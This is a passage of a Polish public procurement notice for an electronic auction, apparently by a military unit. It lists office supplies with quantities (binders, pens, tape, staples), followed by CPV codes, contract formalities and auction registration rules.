104	naboje atramentowe do pióra typu Parker, długie, kolor niebieski (op.kartonowe 5 szt)	op.	200
105	naboje atramentowe do pióra typu Waterman, długie, kolor niebieski (op. kartonowe 8 szt.)	op.	200
106	nóż z ostrzem łamanym 18 mm, korpus wykonany ze stali nierdzewnej pokryty miękkim tworzywem, mocna śrubowa blokada zwiększająca bezpieczeństwa pracy, w komplecie zapasowe ostrze	szt.	100
107	nóż z ostrzem łamanym 9 mm, korpus wykonany ze stali nierdzewnej pokryty miękkim tworzywem, mocna śrubowa blokada zwiększająca bezpieczeństwa pracy, w komplecie zapasowe ostrze	szt.	100
108	ołówek automatyczny,  w nieprzezroczystej jednokolorowej obudowie, o przekroju trójkata, wyposażony w wysuwający się mechanizm zaciskowy  oraz gumkę, linia pisania 0,5 mm, nazwa producenta, typ oraz grubość podana na korpusie	szt.	500
109	ołówek automatyczny,  w nieprzezroczystej jednokolorowej obudowie, o przekroju trójkata, wyposażony w wysuwający się mechanizm zaciskowy  oraz gumkę, linia pisania 0,7mm, nazwa producenta, typ oraz grubość podana na korpusie	szt.	500
110	ołówek drewniany z gumką, z elastycznym grafitem o średnicy 2 mm odpornym na złamania, twardość HB, nazwa producenta, typ oraz twardość podana na korpusie	szt.	100
111	ołówek z gumką, wykonany z żywicy syntetycznej, plastyczny, twardość HB	szt.	500
112	papier samoprzylepny matowy bezchlorowy A4 (etykiety) do drukarek atramentowych, laserowych i kserokopiarek, gramatura łącznie z podkładem 143 g/m2, z klejem na bazie wody, (op. 100 szt), kolor biały	op.	50
113	papier samoprzylepny A4, do drukarki atramentowej i laserowej, gramatura papieru min. 80 g/m2, (op. 20 szt.), kolor czerwony ciemny 	op.	50
114	papier samoprzylepny A4, do drukarki atramentowej i laserowej, gramatura papieru min. 80 g/m2, (op. 20 szt.), kolor niebieski ciemny	op.	50
115	papier samoprzylepny A4, do drukarki atramentowej i laserowej, gramatura papieru min. 80 g/m2, (op. 20 szt.), kolor zielony 	op.	50
116	papier samoprzylepny A4, do drukarki atramentowej i laserowej, gramatura papieru min. 80 g/m2, (op. 20 szt.), kolor żółty jasny	op.	50
117	papier samoprzylepny B2, matowy, do drukarki atramentowej i laserowej, z nacięciem ułatwiającym odklejanie, gramatura papieru min. 80 g/m2, kolor czerwony ciemny	szt.	10
118	papier samoprzylepny B2, matowy, do drukarki atramentowej i laserowej, z nacięciem ułatwiającym odklejanie, gramatura papieru min. 80 g/m2, kolor niebieski ciemny	szt.	10
119	papier samoprzylepny B2, matowy, do drukarki atramentowej i laserowej, z nacięciem ułatwiającym odklejanie, gramatura papieru min. 80 g/m2, kolor zielony	szt.	10
120	papier samoprzylepny B2, matowy, do drukarki atramentowej i laserowej, z nacięciem ułatwiającym odklejanie, gramatura papieru min. 80 g/m2, kolor żółty jasny	szt.	10
121	pisak do tablic suchościeralnych z możliwością ponownego napełnienia, z atramentem typu dry safe umożliwiającym pozostanie bez skuwki kilka dni i niewysychanie, skuwka z klipsem w kolorze tuszu, okrągła końcówka, szerokość linii pisania 2mm, kolor czarny	szt.	100
122	pisak do tablic suchościeralnych z możliwością ponownego napełnienia, z atramentem typu dry safe umożliwiającym pozostanie bez skuwki kilka dni i niewysychanie, skuwka z klipsem w kolorze tuszu, okrągła końcówka, szerokość linii pisania 2mm, kolor czerwony	szt.	50
123	pisak do tablic suchościeralnych z możliwością ponownego napełnienia, z atramentem typu dry safe umożliwiającym pozostanie bez skuwki kilka dni i niewysychanie, skuwka z klipsem w kolorze tuszu, okrągła końcówka, szerokość linii pisania 2 mm, kolor niebieski	szt.	100
124	podajnik  do taśmy klejącej o szerokości 19 mm, z obciążoną podstawą, z gumą antypoślizgową, średnica rolki 28 mm, kolor czarny 	szt.	100
125	poduszka do stempli o wymiarach 117x70 mm, nasączona - kolor czerwony	szt.	20
126	poduszka do stempli o wymiarach 117x70 mm, nasączona - kolor czarny	szt.	20
127	pojemnik na dokumenty A4/75mm, wykonany z tektury o grubości 2,1 mm pokrytej folią polipropylenową, składany, ścięty, ze wmocnionym otworem na palec, dwustronną etykietą na grzbiecie, dostępny w kolorach: czerwonym, niebieskim, zielonym, żółtym, dostarczony w równych ilościach każdego koloru	szt.	60
128	półka na dokumenty przezroczysta lekka, specjalne miejsce na klips opisowy z etykietą, możliwość ustawiania szufladek jedna na drugiej 	szt.	300
129	przybornik z 4 przegrodami na akcesoria piszące,  przegroda  na karteczki 76 mm x 76 mm,  jedna przegroda na wizytówki, taśmy samoprzylepne, gumki i itp. Wymiary: 155 x 105 x 101 (+/- 1 mm)	szt.	150
130	segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 5 cm,  z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor czarny  	szt.	300
131	segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 5 cm,  z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor czerwony  	szt.	300
132	segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 5 cm, z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor niebieski  	szt.	300
133	segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 5 cm, z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor szary  	szt.	300
134	segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 5 cm, z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor zielony	szt.	300
135	segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 5 cm, z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor żółty 	szt.	300
136	segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 7,5 cm, z grubego kartonu, okleina z  poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor czerwony  	szt.	100
137	segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 7,5 cm, z grubego kartonu, okleina z  poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor niebieski	szt.	400
138	segregator A5 z mechanizmem dźwigniowym, szer. grzbietu 7,5 cm, z grubego kartonu, pokryty folią PP (100 m), z dwustronną etykietą, na grzbiecie wzmocniony otwór na palec, kolor niebieski i żółty w równych ilościach 	szt.	60
139	skoroszyt A4,  ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna czerwona 	szt.	200
140	skoroszyt A4,  ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna niebieska 	szt.	200
141	skoroszyt A4,  ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna szary	szt.	200
142	skoroszyt A4,  ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna zielona	szt.	100
143	skoroszyt A4,  ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna żółta	szt.	50
144	skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna czerwona 	szt.	300
145	skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna niebieska	szt.	300
146	skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna szara	szt.	300
147	skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna zielona	szt.	300
148	skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna żółta	szt.	300
149	spinacze biurowe, okrągłe, 33 mm, niklowane, (op. 100 szt.)	szt.	1500
150	taśma klejąca, 19 mm x 33 m, wykonana z folii, grubość min. 60 mic, wytrzymała na rozciąganie (min 25%),  matowa, w opakowaniu pojedynczym kartonowym, niewidoczna na fotokopiach po naklejeniu, nie żółknąca z czasem, z możliwością pisania po niej	szt.	200
151	taśma klejąca dwustronna  piankowa, szer. 19 mm,  (tolerancja +/- 1mm), długość 3 m, grubość:   1 mm (tolerancja + 0,5mm), biała, wzmocniona powłoka ochronna na stażenie, klej odporny na działanie światła	szt.	100
152	taśma klejąca dwustronna, 38 mm x 10 m, pokryta obustronnie emulsyjnym klejem akrylowym, zabezpieczona warstwą papieru (tolerancja +/- 1 mm dla szerokości i +/- 1 m dla długości)	szt.	100
153	taśma klejąca, 19 mm x 33 m, przezroczysta,  w opakowaniu jednostkowym zabezpieczonym folią	szt.	300
154	taśma klejąca, 24 mm x 20 m, przezroczysta (tolerancja +/- 1 m dla długości)	szt.	200
155	taśma pakowa, kolor - przezroczysta,  rozmiar min. 48 mm x 50 m (tolerancja +/- 1 m dla długości)	szt.	120
156	taśma pakowa, kolor  - brąz,  rozmiar min. 48 mm x 50 m (tolerancja +/- 1 m dla długości)	szt.	120
157	teczka na dokumenty z gumką, formatu A4,  jednostronnie powleka folią polipropylenową, tektura min. 400 g/m2,  grzbiet do 20 mm, różne kolory	szt.	500
158	deska z klipsem, z dwiema okładkami sztywnymi, format A4, z wewnętrzną kieszenią na notatki, wizytówki, z uchwytem na długopis, różne kolory	szt.	50
159	teczka z rączką A4/50 mm kolor czarny i niebieski w równych ilościach	szt.	80
160	teczka z rączką A4/80 mm kolor czarny i niebieski w równych ilościach	szt.	80
161	dwuotworowa temperówka plastykowa z pojemnikiem i pokrywką zabezpieczającą, potrójnie mocowane stalowe ostrze pokryte cynkiem, dwukolorowa,  	szt.	300
162	tusz bezolejowy o zawartości wody do 30%, do stempli, automatów,  poduszek i pudełek stemplarskich, pojemność 25 ml (+/-1ml), czarny  	szt.	100
163	tusz bezolejowy o zawartości wody do 30%, do stempli, automatów,  poduszek i pudełek stemplarskich, pojemność 25 ml (+/-1 ml), czerwony  	szt.	100
164	tusz bezolejowy o zawartości wody do 30%, do stempli, automatów,  poduszek i pudełek stemplarskich, pojemność 25 ml (+/-1 ml), niebieski 	szt.	30
165	uchwyt magnetyczny na 4 markery (średnica markerów do 20 mm), markery umieszczone pionowo, skuwkami do góry	szt.	50
166	pinezki kolorowe baryłki do tablic, op. 50 szt.	op.	200
167	wkład do cienkopisu z poz. 8	szt.	200
168	wkład do cienkopisu z poz. 9	szt.	200
169	wkład do cienkopisu z poz. 10	szt.	200
170	wkład do długopisu żelowego kolor czarny z poz. 24	szt.	600
171	wkład do długopisu żelowego kolor niebieski z poz. 25	szt.	600
172	wkład do długopisu żelowego kolor czerwony z poz. 24 i 25	szt.	240
173	wkład do długopisu żelowego typu pilot G1/zielony	szt.	240
174	wkład do długopisu typu Ballograf na łańcuszku - niebieski	szt.	50
175	wkład do długopisu typu Parker, kolor czarny F	szt.	120
176	wkład do długopisu typu Parker, kolor niebieski F	szt.	240
177	wkład do długopisu czarny z poz. 12 	szt.	240
178	wkład do długopisu czerwony z poz. 13 	szt.	120
179	wkład do długopisu niebieski z poz. 11 	szt.	240
180	wkład do długopisu zielony z poz. 14 	szt.	120
181	wkład do pióra kulkowego typu Parker, kolor czarny F	szt.	50
182	wkład do pióra kulkowego typu Parker, kolor niebieski F	szt.	300
183	wkład żelowy typu pilot G2/czarny	szt.	300
184	wkład żelowy typu pilot G2/niebieski	szt.	800
185	grafity do ołówków automatycznych, twardość HB, szerokość linii pisania 0,5 mm, wykonane z połączenia żywicy syntetycznej, węgla i grafitu, bez szkodliwych substancji, nieprzezroczysta fiolka z naniesioną nazwą producenta (op.12 szt.)	szt.	200
186	grafity do ołówków automatycznych, twardość HB, szerokość linii pisania 0,7 mm, wykonane z połączenia żywicy syntetycznej, węgla i grafitu, bez szkodliwych substancji, nieprzezroczysta fiolka z naniesioną nazwą producenta (op.12 szt.)	szt.	300
187	zakładki indeksujące 12 x 43 mm (+/-1mm) , samoprzylepne, neonowe, z możliwością wielokrotnego odklejania i przyklejania, do użytku z pojemnikiem 3M 680-ISK, (op. 4x35 szt.), 4 kolorowe, każdy kolor w dyspenserku.	szt.	400
188	zakładki indeksujące 25x43mm, samoprzylepne foliowe, z możliwością wielokrotnego odklejania i przyklejania, do użytku z pojemnikiem 3M 680-ISK (op. 50 szt.), różne kolory, każdy kolor w dyspenserku.	szt.	400
189	zakreślacz z fluorescencyjnym z tuszem pigmentowym, z formułą gwarantującą bezpieczeństwo wydruków atramentowych, z możliwością napełniania stacją dozującą, płaski ze ściętą końcówką, szerokość linii pisania 1-5 mm, nazwa producenta, logo, kraj wyprodukowania oraz numer artykułu i kod kreskowy na obudowie (kpl. 4 kol. w fabrycznym etui).	szt.	250
190	zeszyt (brulion) w kratkę A5, 32 kartkowy, miękka lakierowana okładka, gramanutra kartek min. 60 g/m2	szt.	500
191	zeszyt (brulion) w kratkę A5, 96 kartkowy, szyty, miękka lakierowana okładka, gramanutra kartek min. 60 g/m2	szt.	300
192	zeszyt (brulion) w kratkę A4, 96 kartkowy, szyty, miękka lakierowana okładka, gramanutra kartek min. 60 g/m2	szt.	300
193	zeszyt (brulion) w kratkę A4, 96 kartkowy, szyty i klejony, laminowana okładka, gramatura kartek min. 60 g/m2	szt.	200
194	zeszyt (brulion) w kratkę A5, 96 kartkowy, szyty i klejony, laminowana okładka, gramatura kartek min. 60 g/m2	szt.	200
195	zszywki 23/10, stalowe - galwanizowane elektrycznie, o dużej twardości i odporności na rozciaganie, ocynkowane (op.1000 szt.),  	szt.	120
196	zszywki 23/13, stalowe - galwanizowane elektrycznie, o dużej twardości i odporności na rozciaganie, ocynkowane (op.1000 szt.),  	szt.	120
197	zszywki 23/8, stalowe - galwanizowane elektrycznie, o dużej twardości i odporności na rozciaganie, ocynkowane (op.1000 szt.),  	szt.	120
198	kalka ołówkowa z woskiem A4, gramatura min. - 18 gsm kalka, min. 10 gsm tusz, op. 50 szt.	op.	10
199	wąsy skoroszytowe umożliwiające spęcie luźnych dokumentów i wpięcie do segregatora, wykonane z kolorowego polipropylenu - różne kolory, op. 25 szt.	op.	500
			
CPV:    30190000-7, 22816300-6, 30199130-0, 30199230-1, 30199410-7, 22815000-6, 22816000-3, 30193200-0, 22851000-0, 30199792-8, 30192000-1, 30197220-4, 30192100-2, 30192111-2, 30192121-5, 30192125-3, 30192130-1, 30197330-8, 30192131-8, 30192160-0, 30197130-6, 30199731-3, 44174000-0, 30192115-3, 30192800-9, 24910000-6, 30199230-1, 30199410-7.     
Formalności niezbędne do zawarcia umowy jakie powinny zostać dopełnione po wyborze oferty.
Przekazać faksem lub e-mail:
1) dane do wpisania w umowie (m. in. adres);
2) inne niezbędne dane wynikające z treści umowy;
3) wysokość kwoty netto wynikającej z oferty;
4) złoży wypełniony dokument zawierający ceny, wartość, nazwę producenta, nazwę produktu nadaną przez producenta i numer katalogowy producenta, sumę która musi być indentyczna 
z wylicytowaną kwotą;
5) przed podpisaniem umowy do każdego artykułu zawartego w umowie należy złożyć dokumenty potwierdzające spełnianie wymagań określonych w opisie przedmiotu zamówienia np. karty produktu, opis przedmiotu itp. Niedopełnienie tych formalności stanowić będzie uchylenie się przez wykonawcę od zawarcia umowy.
Warunki gwarancji - minimum 12 miesięcy od daty dostawy<br /><br /><b>II.5) Główny kod CPV: </b>30190000-7<br /><b> Dodatkowe kody CPV:</b>22816300-6,
                30199130-0,
                30199230-1,
                30199410-7,
                22815000-6,
                22816000-3,
                30193200-0,
                22851000-0,
                30199792-8,
                30192000-1,
                30197220-4,
                30192100-2,
                30192111-2,
                30192121-5,
                30192125-3,
                30192130-1,
                30197330-8,
                30192131-8,
                30192800-9,
                24910000-6,
                30199230-1,
                30199410-7,
                30192160-0,
                30197130-6,
                30199731-3,
                44174000-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, 2) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy p.z.p. według załącznika nr 7 do ogłoszenia </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Przed podpisaniem umowy do każdego artykułu zawartego w umowie należy złożyć dokumenty potwierdzające spełnianie wymagań określonych w opisie przedmiotu zamówienia np. karty produktu, opis przedmiotu itp.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) wniosek o dopuszczenie do udziału w licytacji, który stanowi załącznik nr 3 do ogłoszenia, 
2)Oryginał lub kopię pełnomocnictwa dla osoby/osób podpisującej/cych wniosek o dopuszczenie do udziału w licytacji, gdy prawo do podpisania wniosku nie wynika z innych dokumentów </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                licytacja elektroniczna
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja jednoetapowa
                  <br />Czas trwania: <br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px">https://licytacje.uzp.gov.pl</div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px">http://1bltr.wp.mil.pl</div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px">1. Wykonawca ma prawo złożyć tylko jeden wniosek. 2. Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem https://licytacje.uzp.gov.pl Wykonawca, aby umożliwić Zamawiającemu dopuszczenie do udziału w licytacji, winien zarejestrować się w systemie dostępnym na stronie https://licytacje.uzp.gov.pl, a wraz z wnioskiem o dopuszczenie do udziału w licytacji, powinien przekazać Zamawiającemu informację o swoim loginie. 3. Login powinien uniemożliwić identyfikację Wykonawcy. W przypadku niepodania loginu we wniosku, lub też błędnego podania loginu niezarejestrowanego na stronie https://licytacje.uzp.gov.pl, Zamawiający wezwie Wykonawcę do uzupełnienia w wyznaczonym terminie loginu, który umożliwi przypisanie Wykonawcy do prowadzonej licytacji poprzez jego wpisanie na listę Wykonawców (na platformie licytacji) biorących w niej udział. Brak uzupełnienia w wyznaczonym terminie loginu, skutkować będzie brakiem możliwości wzięcia udziału Wykonawcy w licytacji. Uwaga: nie należy przesyłać swojego hasła Zamawiającemu, ani udostępniać hasła osobom nieuprawnionym. 4. Od Wykonawców chcących wziąć udział w przedmiotowej licytacji nie jest wymagany podpis elektroniczny. Wymagania techniczne: Komputer PC z systemem operacyjnym Windows/Linux oraz przeglądarka internetowa Internet Explorer 6.0 lub wyższa lub Firefox 2.0 lub wyższa.
</div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
